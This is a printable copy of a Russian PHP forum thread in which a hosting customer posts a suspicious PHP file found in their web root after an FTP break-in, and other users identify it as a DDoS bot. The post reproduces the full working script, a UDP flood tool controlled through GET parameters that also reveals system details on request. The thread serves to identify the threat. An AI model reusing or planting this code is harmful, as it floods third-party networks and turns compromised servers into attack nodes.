Warning: Cannot use a scalar value as an array in /home/admin/public_html/forum/include/fm.class.php on line 757

Warning: Invalid argument supplied for foreach() in /home/admin/public_html/forum/include/fm.class.php on line 770
Форумы портала PHP.SU :: Версия для печати :: Взлом ftp и появление посторонних файлов на хостинге
Форумы портала PHP.SU » » Вопросы новичков » Взлом ftp и появление посторонних файлов на хостинге

Страниц (1): [1]
 

1. Evgenylebedevv - 12 Мая, 2016 - 01:47:18 - перейти к сообщению
Недавно обнаружил у себя на хостинге в корневой директории вот такой вот файлик, по моему он собирает данные с пользователей и кому-то отсылает (название ctioVp):

PHP:
скопировать код в буфер обмена
  2. $host = $_GET['host'];
  3. $port = $_GET['port'];
  4. $exec_time = $_GET['time'];
  5. $Sendlen = $_GET['len'];
  7.  
  8. if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0)
  9. {
  10.         if (StrLen($_GET['rat'])<>0)
  11.         {
  12.                 echo php_uname();
  13.                 exit;
  14.         }
  15.         exit;
  16. }
  17.  
  18. for($i=0; $i < $Sendlen; $i++)
  19. {
  20.         $out .= "A";
  21. }
  22.  
  23. $max_time = time() + $exec_time;
  24. while(1)
  25. {
  26.     if(time() > $max_time)
  27.         {
  28.         break;
  29.     }
  30.     $fp = fsockopen("udp://$host", $port, $errno, $errstr, 5);
  31.     if($fp)
  32.         {
  33.                 fwrite($fp, $out);
  34.                 fclose($fp);
  35.     }
  36. }

Что это такое?
2. kuller - 12 Мая, 2016 - 02:38:46 - перейти к сообщению
похоже вот ответ на ваш вопрос http://www.php.su/fsockopen
3. Мелкий - 12 Мая, 2016 - 07:56:35 - перейти к сообщению
Поздравляю, вы участник DDoS атакующей системы.
Скрипт получает параметрами куда, как долго, и сколько пустых данных отправлять и этим и занимается. Цель - забить канал атакуемой системы всяким бесполезным флудом.

 

Powered by ExBB FM 1.0 RC1